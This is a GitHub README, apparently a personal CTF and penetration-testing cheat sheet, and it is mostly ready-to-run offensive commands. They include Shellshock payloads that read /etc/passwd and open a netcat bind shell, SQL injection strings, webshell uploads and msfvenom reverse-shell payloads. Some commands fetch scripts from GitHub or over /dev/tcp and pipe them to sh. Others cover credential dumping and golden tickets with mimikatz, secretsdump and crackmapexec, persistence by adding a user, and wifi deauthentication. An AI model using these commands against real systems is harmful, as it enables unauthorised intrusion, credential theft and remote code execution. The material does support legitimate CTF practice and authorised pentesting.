Skip to content

fursiol0800/Hacking-and-CTF-Cheat-Sheet

 
 

Repository files navigation

Hacking-and-CTF-Cheat-Sheet

This is my collection of Commands and Syntax for all utils i use when trying to hack CTF's challanges, maybe it can help others...

Enjoy @hasamba

Hacking Cheat Sheet

Reconnaissance (Information Gathering)

  • hunter.io - known email and users for a specific domain

  • theharvester - search for emails in several search engines

    theHarvester -d *.co.il -l 500 -b google
  • sublist3r - search for subdomain for a given domain

  • crt.sh - subdomains search with %.tesla.co.il

  • httprobe - will check a list of domain if they are alive, we can fire it sublis3r results

  • amass - can also search for subdomains and more

    amass enum -d tesla.com
  • builtwith - show frameworks and technologies any domain is built with, then we can search for exploits for those technologies

  • wappalizer - browser addon that does almost the same as builtwith

  • whatweb - same but uglier than builtwith

  • sumrecon - script that automate some of the above

  • shodan.io - find open ports and services online

  • dnsdumpster - dns recon & research, find & lookup dns records

  • ipinfo.io - ip info

  • dehashed - find leaked emails and passwords

  • simplyemail - enumerate all the online places (github, target site etc)

    git clone https://github.com/killswitch-GUI/SimplyEmail.git
    ./SimplyEmail.py -all -e TARGET-DOMAIN
    
  • DNSRecon - DNS Bruteforce

    dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
  • Skipfish - prepares an interactive sitemap for the targeted site

    # basic scan
    skipfish -o out_dir https://www.host.com
    # using cookies to access authenticated pages
    skipfish -o out_dir -I urls_to_scan -X urls_not_to_scan -C cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -C cookie2=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  https://www.host.com
  • namechk / whatsmyname / namecheckup - OSINT use accounts around the web

  • maltego - data mining application

  • Exploiting Shellshock

    git clone https://github.com/nccgroup/shocker
    ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

    cat file (view file contents)

    echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

    Shell Shock run bind shell

    echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

    Shell Shock reverse Shell

    nc -l -p 443

Scanning

  • arp-scan (Kali) - gives all IP's on NAT

  • netdiscover (Kali) - show live IP's

    sudo netdiscover -r 10.0.0.0/24
  • rustscan - Scans all 65k ports in 3 seconds and pipe them to NMAP

    rustscan -a 127.0.0.1 -- -A -sC 
    #it's like running nmap -Pn -vvv -p $PORTS -A -sC 127.0.0.1
  • nmap

    nmap -T4 -p- -A 192.168.249.128
    nmap -sV -sC -O FILENAME IP
    nmap -sU -sV --script=vuln #search vulnarabilities
    #T4: speed 1-5, prefered 4, 
    #-p-: scan all 65K ports, 
    #-A: all information possible, 
    #-sS: stealth mode is running by default, it means that we do not establish a connection, instead after ACK we send a reset (SYN→SYNACK→RST)
    #-sV: find versions
    #-sc: default script
    #-O: output to file
    ls /usr/share/nmap/scripts/* | grep ftp #Search nmap scripts for keywords
    
    #clean results
    grep '/tcp' FILENAME | awk -F "/" '{print $1}'| tr '\n' ',';echo
  • masscan (kali): another fast port scanner

    masscan -p1-65535 --rate 1000 10.0.0.101
  • metasloit - auxiliary in msf is extra enumration and recon

    use auxiliary/scanner/smb/smb_version
  • searchsploit (kali) - search exploit-db website offline

    searchsploit mod ssl 2
  • Nessus - vulnerability assessment, it can scan for open ports, open vulnerabilities, directory busting

  • openvas - Vulnerability Assessment

    apt-get update
    apt-get dist-upgrade -y
    apt-get install openvas
    openvas-setup
    netstat -tulpn #Verify openvas is running using
    #Login at https://127.0.0.1:9392 - credentials are generated during openvas-setup
    

AIO Scanners

  • nmap automator - A script that you can run in the background!

    ./nmapAutomator.sh <TARGET-IP> <TYPE>  
    ./nmapAutomator.sh 10.1.1.1 All  
    ./nmapAutomator.sh 10.1.1.1 Basic  
    ./nmapAutomator.sh 10.1.1.1 Recon
  • autorecon - multi-threaded network reconnaissance tool which performs automated enumeration of services

    autorecon 127.0.0.1
    
  • Vanquish - AIO tool (NMap | Hydra | Nikto | Metasploit | | Gobuster | Dirb | Exploitdb | Nbtscan | | Ntpq | Enum4linux | Smbclient | Rpcclient | | Onesixtyone | Sslscan | Sslyze | Snmpwalk | | Ident-user-enum | Smtp-user-enum | Snmp-check | Cisco-torch | | Dnsrecon | Dig | Whatweb | Wafw00f | | Wpscan | Cewl | Curl | Mysql | Nmblookup | Searchsploit | | Nbtscan-unixwiz | Xprobe2 | Blindelephant | Showmount)

    echo "[IP]" > ~/tools/vanquish/hosts.txt
    python2 Vanquish2.py -hostFile hosts.txt -logging -outputFolder ~/hackthebox/[BOXNAME]
    
  • hackerEnv - automation tool that quickly and easily sweep IPs and scan ports, vulnerabilities and exploit them

    ./hackerEnv -t 10.10.10.10
  • fsociety - A Penetration Testing Framework, you will have every script that a hacker needs

  • recon-ag - full-featured web reconnaissance framework written in Python

    git clone https://github.com/lanmaster53/recon-ng.gitcd /recon-ng
    ./recon-ng
    show modules
    help
  • autorecon - multi-threaded network reconnaissance tool which performs automated enumeration of services

    autorecon 127.0.0.1
  • legion - Automatic Enumeration Tool

    sudo ~/tools/legion/legion.py
    options
    set host 10.0.0.210
    run

Enumeration Open Ports

Pentesting Network

FTP Enumeration (21)

nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1
FTP anonymous sign in
	mget * #download everything

#can we upload file as anonymous?
#if so we can try upload a cmd webshell and execute commands
locate cmd.aspx #if iis
put cmd.aspx
#browse to the file:
http://IP/cmd.aspx

#we can also try to create a shell payload with msfvenum and upload it

SSH (22):

ssh INSERTIPADDRESS 22

nc IP 22

nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst --script-args ssh-brute.timeout=4s

#downloading
scp username@hostname:/path/to/remote/file /path/to/local/file

If NMAP show "SSH Filtered" it means that port knocking is enable

#we need to find the /etc/knockd.conf (thorough LFI or FTP or something else)
#inside there is a sequence
knock IP SEQUENCE1 SEQUENCE2 SEQUENCE3
#check nmap again

SMTP Enumeration (25):

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
nc -nvv INSERTIPADDRESS 25
telnet INSERTIPADDRESS 25
use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 192.168.1.107
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt
msf auxiliary(smtp_enum) > exploitw

DNS (53)

#DNS zone transfer
sudo nano /etc/hosts
10.10.10.123  friendzone.red 
host -l friendzone.red 10.10.10.123

Finger Enumeration (79):

Download script and run it with a wordlist: http://pentestmonkey.net/tools/user-enumeration/finger-user-enum

finger-user-enum.pl [options] (-u username|-U users.txt) (-t host|-T ips.txt)(

Web Enumeration (80/443):

extra enumeration from hacktricks

if we get default apache page, try entering IP to HOSTS

Before dirbusting, try going to index.php or index.html to know which extention to look for

dirbuster (GUI)
#1st try without "be recursive"
cd ~/tools
./feroxbuster -u URL -w WORDLIST -x EXT -C 403 -t 100
Web Extensions

sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar
dirb http://target.com /path/to/wordlist
dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old
gobuster dir -u https://target.com -b 403 ms-w /usr/share/wordlists/dirb/big.txt -x .txt,.php
use -r (recursive) or try found folders
nikto –h 10.0.0.1 #web vulnerability scanner
owasp zap
Look for Default Credentials
sql
  • View Page Source

    Hidden Values
        Developer Remarks
        Extraneous Code
        Passwords!
  • burpsuite

    compare “host:”
    crsf token = no bruteforce
    add php code if url has anything.php
            <L>
     anything being executed?
            try directory traversal
                ../../../home
  • sign in page

    SQL Injection
    
        ‘or 1=1– –
        ‘ or ‘1’=1
        ‘ or ‘1’=1 — –
        ‘–
        Use known Username
            tyler’ — –
            tyler’) — –
    
    #bruteforce
    hydra -L <username list> -p <password list> <IP Address> <form parameters><failed login message>
  • file upload

    #if NMAP show something like: Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND
    #we want to check if we can upload files
    davtest -url http://IP
    #if we see succedd we can use curl to upload:
    curl -X PUT http://10.10.10.15/df.txt -d @test.txt
    #and execute it:
    **curl http://10.10.10.15/df.txt**
    
    Blacklisting bypass
            bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6 
        Whitelisting bypass
            passed by uploading a file with some type of tricks, Like adding a null byte injection like ( shell.php%00.gif ). Or by using double extensions for the uploaded file like ( shell.jpg.php)
  • Wfuzz - Subdomain brute forcer, replaces a part of the url like username with wordlist

    wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test
    
    wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ
    
    wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"
    
    wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ
    
    wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ
  • Knockpy - enumerate subdomains on a target domain through a wordlist

    knockpy domain.com
  • wpscan - if wordpress found

    wpscan --url [http://:80$target](http://:80$target) --enumerate u,t,p | tee $target-wpscan-enum
    #if we can enter wordpres, we can change the 404 page to php reverse shell code and gain access
  • joomscan - if joomla found

    cd ~/tools/joomscan
    perl joomscan.pl -u http://10.10.10.150/administrator/

If A File is found

  • steghide - check pictures for hidden files

        apt-get install steghide
    
        steghide extract -sf picture.jpg
    
        steghide info picture.jpg
    
        apt-get install stegosuite
  • Stegseek - lightning fast steghide cracker to extract hidden data from files

    stegseek [stegofile.jpg] [wordlist.txt]
  • binwalk - extract hidden files from files (steganography)

    binwalk FILE.JPG
    #if something was found 
    binwalk -e FILE
  • strings - check strings in files

    stringe FILE.jpg
  • exiftool - pictures metadata

  • zip2john - prepare an encrpyted zip file for john hacking

    zip2john ZIPFILE > zip.hashs
  • SQLite DB

    #if we found a flat-file db 
    file EXAMPLE.db
    #if sqlite3
    sqlite3 <database-name>
    .tables
    PRAGMA table_info(customers);
    SELECT * FROM customers;
  • sqlmap - check website for sql injection (more info down)

    Sqlmap trick - if we have a login page, we can try admin:admin, catch that in burpsuite, save the full request to a file, run:

    sqlmap -r FILENAME --level=5 --risk=3 --batch
    sqlmap -r FILENAME -dbs --level=5 --risk=3 --batch
    
    sqlmap -r FILENAME --dbs #enumarate DB's
    sqlmap -r FILENAME -D DB_Name --tables #enumarate tables
    sqlmap -r FILENAME -D DB_Name -T TABLE_Name --dump #DUMP table
    
    #Find SQL in webpage url automatically
    sqlmap -u https://IP/ –crawl=1
    
    #with authentication
    sqlmap -u “http://target_server” -s-data=param1=value1&param2=value2 -p param1--auth-type=basic --auth-cred=username:password
    
    #Get A Reverse Shell (MySQL)
    sqlmap -r post_request.txt --dbms "mysql" --os-shell
  • fimap - Check for LFI, find, prepare, audit, exploit and even google automatically for local and remote file inclusion

    ~/tools/fimap/src/fimap.py –H –u http://target-site.com/ -w output.txt

    If we see in burpsuite php$url= we need to test for LFI (try /etc/passwrd)

    http://$ip/index.php?page=/etc/passwd
    http://$ip/index.php?file=../../../../etc/passwd

if a page redirects to another, we can use burp to stop

Proxy -> Options -> Match and Replace

Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled.png

Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%201.png

kerberos (88):

tel#add host to /etc/hosts
sudo gedit /etc/hosts

./GetUserSPNs.py -request active.htb/SVC_TGS > admin.txt
#the password we will get will be encrypted
john admin.txt --wordlist=/usr/share/wordlists/rockyou.txt

#with the cracked password...
psexec.py administrator@active.htb

Pop3 (110):

telnet INSERTIPADDRESS 110
USER [username]
PASS [password]
  • To login
LIST
  • To list messages
RETR [message number]
  • Retrieve message
QUIT
quits

RPC (135)

rpcclient --user="" --command=enumprivs -N $ip #Connect to an RPC share without a username and password and enumerate privledges
rpcclient --user="<Username>" --command=enumprivs $ip #Connect to an RPC share with a username and enumerate privledges

RPCBind (111):

rpcinfo –p x.x.x.x

SMB\RPC Enumeration (139/445):

smbmap -H 10.10.10.149
smbclient -L \\\\10.0.0.100\\
smbclient \\\\10.0.0.100\\Replication
prompt off #doesnt prompt of us downloading
recurse on` #download all the files
mget *` #download all files in this share
enum4linux -a 10.0.0.1 #Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing
nbtscan x.x.x.x #Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
python /home/hasamba/tools/impacket/build/scripts-3.8/samrdump.py 192.168.XXX.XXX
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse $IP

smb4k on Kali, useful Linux GUI for browsing SMB shares

apt-get install smb4k -y
  • on Windows:
  • Download All Files From A Directory Recursively
smbclient '\\server\share' -N -c 'prompt OFF;recurse ON;cd 'path\to\directory\';lcd '~/path/to/download/to/';mget *'
net use \\TARGET\IPC$ "" /u:"" #Manual Null session testing

SNMP Enumeration (161):

  • Fix SNMP output values so they are human readable:
apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf
snmpwalk -c public -v1 192.168.1.X 1| 
 grep hrSWRunName|cut -d* * -f
snmpcheck -t 192.168.1.X -c public
onesixtyone -c names -i hosts
nmap -sT -p 161 192.168.X.X -oG snmp_results.txt
nmap -n -vv -sV -sU -Pn -p 161,162 –script=snmp-processes,snmp-netstat IP
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts
#metasploit
    auxiliary/scanner/snmp/snmp_enum
    auxiliary/scanner/snmp/snmp_enum_hp_laserjet
    auxiliary/scanner/snmp/snmp_enumshares
    auxiliary/scanner/snmp/snmp_enumusers
    auxiliary/scanner/snmp/snmp_login

Oracle (1521):

tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS

LDAP (389)

JXplorer - an open source LDAP browser

MSSQL (1433)

nmap -n -v -sV -Pn -p 1433 –script ms-sql-brute –script-args userdb=users.txt,passdb=passwords.txt IP
nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password IP

Hunting for MSSQL | Offensive Security

Mysql Enumeration (3306):

nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122

mysql –h IP -u root -p
show databases;
show tables;
use tablename;
describe table;
select table1, table2 from tablename;

Active Directory

# current domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# domain trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

# current forest info
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

# get forest trust relationships
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()

# get DCs of a domain
nltest /dclist:offense.local
net group "domain controllers" /domain

# get DC for currently authenticated session
nltest /dsgetdc:offense.local

# get domain trusts from cmd shell
nltest /domain_trusts

# get user info
nltest /user:"spotless"

# get DC for currently authenticated session
set l

# get domain name and DC the user authenticated to
klist

# get all logon sessions. Includes NTLM authenticated sessions
klist sessions

# kerberos tickets for the session
klist

# cached krbtgt
klist tgt

# whoami on older Windows systems
set u

# find DFS shares with ADModule
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name

# find DFS shares with ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name}

# check if spooler service is running on a host
powershell ls "\\dc01\pipe\spoolss"

MSSQL

Try using "Browse for More" via MS SQL Server Management Studio

Enumeration / Discovery:

Nmap:

nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156

Metasploit:

msf > use auxiliary/scanner/mssql/mssql_ping

Bruteforce MSSQL Login

msf > use auxiliary/admin/mssql/mssql_enum

Metasploit MSSQL Shell

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Gaining Access

  • hydra: bruteforce tool

    hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.0.0.101 -t 4 -v -f
    #-l is the user we want to attack, -P password file list, -t threads, -v verbose
    #it's better to intercept the login page with burp, check to see the correct username&password syntax and copy the exact failed message
    -#f   exit when a login/pass pair is found
    hydra -l hasamba -P ~/Desktop/test_passwords.txt 10.0.0.210 -s 8085 http-post-form "/login/:username=^USER^&password=^PASS^:F=Authentication failed" -VVV -t 6 -
    hydra OPT #will show us optional moduls for http and such
    hydra -U MODULE_NAME #will show module examples
    
    hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V #Hydra FTP brute force
    hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V #Hydra POP3 brute force
    hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V #Hydra SMTP brute force
    
    hydra -l username -P password-list <URL_TO_SERVER> http-post-form "<PATH-TO_LOGIN>:POST_REQUEST_FOR_LOGIN:FAILED_RESPONSE_IDENTIFIER"
  • metasploit - can also bruteforce

    use auxialary/scanner/ssh/ssh_login
    options
    set username root
    set pass_file /usr/share...
    set rhosts
    set threads 10
    set verbose true
    run
  • unshadow (kali) - combine both files and will insert the hashed passwords to the passwd file, so we can use this file with hashcat to maybe decrypt the password.

    unshadow PASSSWD_FILE SHADOW_FILE
  • hashcat - crack passwords hashes (Cheat Sheet)

    hashcat -m "OSCODE" unshadow.txt passwordFile.txt
    #from here: https://github.com/frizb/Hashcat-Cheatsheet
    hashcat --force -m300 --status -w3 -o found.txt --remove --potfile-disable -r rules\OneRuleToRuleThemAll.rule hash.txt rockyou.txt
  • hash-identifier

    hash-identifier [hash]
  • name-that-hash - better hash analyzer

  • cewl - create wordlist from a website

    cewl  -v --with-numbers -e --email_file cewl_email.wordlist -w cewl.wordlist http://sneakycorp.htbme
    
    #my favorite rule to add:
    john --wordlist=wordlist.txt --rules=jumbo --stdout > wordlist-modified.txt
    
    hashcat --force cewl.wordlist -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words
    
    https://github.com/praetorian-inc/Hob0Rules
    ###hob064 This ruleset contains 64 of the most frequent password patterns
    hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/rockyou.txt -r hob064.rule -o cracked.txt
    
    ###d3adhob0 This ruleset is much more extensive and utilizes many common password structure ideas
    hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/english.txt -r d3adhob0.rule -o cracked.txt
    
    #adding John rules
    john --wordlist=wordlist.txt --rules --stdout > wordlist-modified.txt
    john --wordlist=wordlist.txt --rules=best64 --stdout > wordlist-modified.txt
  • john the ripper - password cracker (cheat sheet) (Jumbo community version)

    john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
    #after john finished, ask him to show
    john hashes.txt --show
    
    john 127.0.0.1.pwdump --wordlist=dictionary.txt --rules=Jumbo #with jumbo rules from https://github.com/openwall/john

    CyberChef

    CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.

    Hash Analyzer

    Cipher Identifier (online tool) | Boxentriq

  • msfvenom(kali) - tool to create malware

    msfvenom -p windows/meterpreter/reverse_tcp LHOSTS=10.10.10.14 LPORT=4444 -f aspx > ex.aspx
    
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
  • responder (imapcket) - MITM - listening in the background and wait for a failed dns request

    responder -I eth0 -rdwv #Run Responder.py for the length of the engagement while you're working on other attack vectors.

Post Exploitation

Useful commands running locally on the Linux system To quickly analyze the system and possibly help to escalate privileges

  • whoami - shows the user we logged in with

  • history - show last history, it usually can show any password or personal stuff the user execute

  • sudo -l - show what programs we can run without sudo, check all process against GTFOBins

    • if we get (ALL, !root) /bin/bash, we can exploit with this
  • uname -a - will show us the linux version so we can search for a script that will escalate privileges

  • export - check system variables

  • processes

    ps -ef
    ps auxf
    ps auxfww
  • find in files

    find . -name "*.java" -type f -exec fgrep -iHn "textToFind" {} \;
    find . -regex ".*\.\(c\|java\)" -type f -exec fgrep -iHn "textToFind" {} \;
    find / -maxdepth 4 -name *.conf -type f -exec grep -Hn "textToFind" {} \; 2>/dev/null
    # SUID files owned by root
    find / -uid 0 -perm -4000 -type f 2>/dev/null
    # SUID files owned by root and world readable
    find / -uid 0 -perm -u=s,o=r -type f -exec ls -la {} \; 2> /dev/null
    # SUID files
    find / -perm -4000 -type f 2>/dev/null
    # world writable directories
    find / -perm -2 -type d 2>/dev/null
    
    #find passwords in files and ignore errors and filter out the proc and other folders
    find . ! -path "*/proc/*" -type f -name "*" -exec fgrep -iHn password {} \;
    find . -type f \( -iname \*.conf -o -iname \*.cfg -o -iname \*.xml -o -iname \*.ini -o -iname \*.json -o -iname \*.sh -o -iname \*.pl -o -iname \*.py \) -exec fgrep -iHn password {} \; 2> /dev/null
    
    # find using several patterns read from file (patterns are delimited by new line)
    find . -type f -exec grep -iHFf patterns.txt {} \;
    
    # find password keyword in small files
    find . -type f -size -512k -exec fgrep -iHn password {} \;
    
    # reverse java jar files and find passwords there
    find . -name "*.jar" -type f -exec ~/jd-cli/jd-cli -oc -l -n -st {} \; | egrep -i -e "Location:" -e "password" | uniq
# check open ports and services listening
netstat -anp

# check defined hosts
cat /etc/hosts

# check local IP addresses and interfaces
ifconfig -a

# check route
route -v

# check filesystem
df

# check sudo privileges
sudo -l

# check crontab
crontab -l

# check inittab
cat /etc/inittab

# try to sniff traffic
tcpdump
tcpdump -s0 not port 22 -w trace.pcap

# check known hosts
cat ~/.ssh/known_hosts

# try access mails
head /var/mail/root

# list groups, users
cat /etc/group
cat /etc/passwd
# with root privileges
cat /etc/shadow

# check shared memory
ipcs -mp

# logout
logout

# close script session
Ctrl + D

Scripts

  • pwncat - pwncat is a post-exploitation platform for Linux targets

    cd ~/tools
    source pwncat-env/bin/activate
    
    # Connect to a bind sheql
    pwncat connect://10.10.10.10:4444
    pwncat 10.10.10.10:4444
    pwncat 10.10.10.10 4444
    # Listen for reverse shell
    pwncat bind://0.0.0.0:4444
    pwncat 0.0.0.0:4444
    pwncat :4444
    pwncat -lp 4444
    # Connect via ssh
    pwncat ssh://user:[email protected]
    pwncat [email protected]
    pwncat user:[email protected]
    pwncat -i id_rsa [email protected]
    # SSH w/ non-standard port
    pwncat -p 2222 [email protected]
    pwncat [email protected]:2222
    # Reconnect utilizing installed persistence
    #   If reconnection failes and no protocol is specified,
    #   SSH is used as a fallback.
    pwncat reconnect://[email protected]
    pwncat reconnect://user@c228fc49e515628a0c13bdc4759a12bf
    pwncat [email protected]
    pwncat c228fc49e515628a0c13bdc4759a12bf
    pwncat 10.10.10.10
    
    ^D
    run enumerate.gather
    
    run escalate.auto exec
    
    ---OLD---
    
    upload/download --help
    
    persist --help
    persist --install
    perist --status
    persist --clean
    
    tamper --help
    
    busybox --install
    
    enum --help
    enum --show --type sudo
    enum --report enumaration.md
    
    privsec --help
    privsec -l
    privsec --escalate
    privsec -e -u sysadmin
  • sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

  • windows exploit suggester - This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

  • metasploit migrate process and search suggester

    ps
    migrate 1788
    search suggester
  • psexec, wmiexec.py or smbexec.py - privilege escalation for windows

  • powershellempire - windows privilege escalation

    powershell -ep (ExecutionPolicy) bypass
    . .\PowerView.ps1
    Get-NetDomain
    Get-NetDomainController
    Get-DomainPolicy
    (Get-DomainPolicy)."system access"
    Get-NetUser
    Get-NetUser | select cn /samaccountname/description
    Get-UserProperty -Properties pwdlastset/logoncount/badpwdcount
    Get-NetComputer -FullData(extra data) | select(like grep) OperatingSystem
    Get-NetGroupMember -GroupName "Domain Admins"
    Invoke-ShareFinder
    Get-NetGPO | select displayname, whenchanged
    
  • bloodhound - easily identify highly complex attack paths

  • crackmapexec - can take passwords or hashes that we found and check them against all computers on a network

    crackmapexec 192.168.57.0/24 -u fcastle -d MARVEL.local -p Password1
    #Spray the network with local login credentials then dump SAM contents
    crackmapexec smb 10.0.0.1/24 -u administrator -p 'password' --local-auth --sam
    #Pass the hash network-wide, local login, dump LSA contents
    crackmapexec smb 10.0.0.1/24 -u administrator -H <hash> --local-auth --lsa
    
  • secretsdump.py (impacket) - dumps hashes for known user/password

    secretsdump.py marvel/fcastle:Pssword1@192.168.4.4
  • incognito (meterpeter) - can impersonate a user

  • GetUserSPNs.py (impacket)

    GetUserSpns.py marvel.local/fcastle:Password1 -dc-ip 192.168.57.140 -request
  • mimikatz - can extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets

    mimikatz
    privilege::debug` (allow us to bypass several protections)
    sekurlsa::logonpasswords` show us all users login from reboot, we can pass the hash or crack them, we can search for `wdigest` until windows8 including windows7 the passoword stored in plain text, from windows8 microsoft turned it off, we can turn it on from mimikatz and wait for a user to login
    lsadump::sam` dumps the SAM
    lsadump::lsa /patch` dumps Local Security Authority
    lsadump::lsa /inject /name:krbtgt`
    kerberos::golden /User:Administrator(doesnt matter, can be fake) /domain:marvel.local /sid:SID /krbtgt:NTLM /id:500(your RID) /ptt(pass the ticket to our next session)`
    misc::command` (gives us command prompt with full privilege)

Privilige Escalation (alot of resources)

Linux privilege escalation

Linux Privilege Escalation CheatSheet for OSCP - ByteFellow

windows privilege escalation

Windows Privilege Escalation Cheatsheet for OSCP - ByteFellow

C0nd4/OSCP-Priv-Esc

Linux:

Find Binaries that will execute as the owner

find / -perm -u=s -type f 2>/dev/null

Find binaries that will execute as the group

find / -perm -g=s -type f 2>/dev/null

Find sticky-bit binaries

find / -perm -1000 -type d 2>/dev/null

If Python is executable as root

python2.7 -c "import pty;pty.spawn('/bin/sh');"
  • LinPeas - Linux Privilege Escalation Awesome Script
#From github
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

#Local network
sudo python -m SimpleHTTPServer 80
curl 10.10.10.10/linpeas.sh | sh

#Without curl
sudo nc -q 5 -lvnp 80 < linpeas.sh
cat < /dev/tcp/10.10.10.10/80 | sh

#Output to file
linpeas -a > /dev/shm/linpeas.txt
less -r /dev/shm/linpeas.txt #Read with colors
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
    #-k Enter keyword
    #-e Enter export location
    #-t Include thorough (lengthy) tests
    #-s Supply current user password to check sudo perms (INSECURE)
    #-r Enter report name
    #-h Displays this help text

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://github.com/pentestmonkey/unix-privesc-check

Windows:

#after getting a low privilege shell
systeminfo
#copy the result to systeminfo.txt
python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --update
python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --systeminfo systeminfo.txt --database [DB].xls

https://github.com/pentestmonkey/windows-prive

sc-check

http://www.fuzzysecurity.com/tutorials/16.html

https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

Maintain Access

  • metasploit

    persistence -h
    OR
    exploit/windows/local/persistence
    OR
    net user hacker password123 /add

Wireless Penetration

  • airmon-ng, airodump-ng, aircrack-ng - crack wifi networks

    iwconfig #show wireless cards, check after connecting the wireless card to the vm machine in options
    airmon-ng check kill #will kill process that intruppt
    airmon-ng start wlan0 #starts monitor mode on the card
    iwconfig #will assure that we are in monitor mode
    airodump-ng wlan0mon #check for avaliable networks, PWR show the closer network, the smallest number is the closest
    airodump-ng -c 6 --bssid MAC -w capture wlan0mon #will capture data from the specific MAC address of the network we want, 6 is the channel number of the network
    
    #we are waiting to capture the handshake, it will written in the header
    #we can make it faster by DEAUTH which means kicking a connected user and while he re-auth we will capture the handshake
    #in a new terminal:
    aireplay-ng -0 1 -a MAC_OF_THE_NETWORK -c MAC_OF_THE_STATION_CONNECTED wlan0mon
    ls capture*
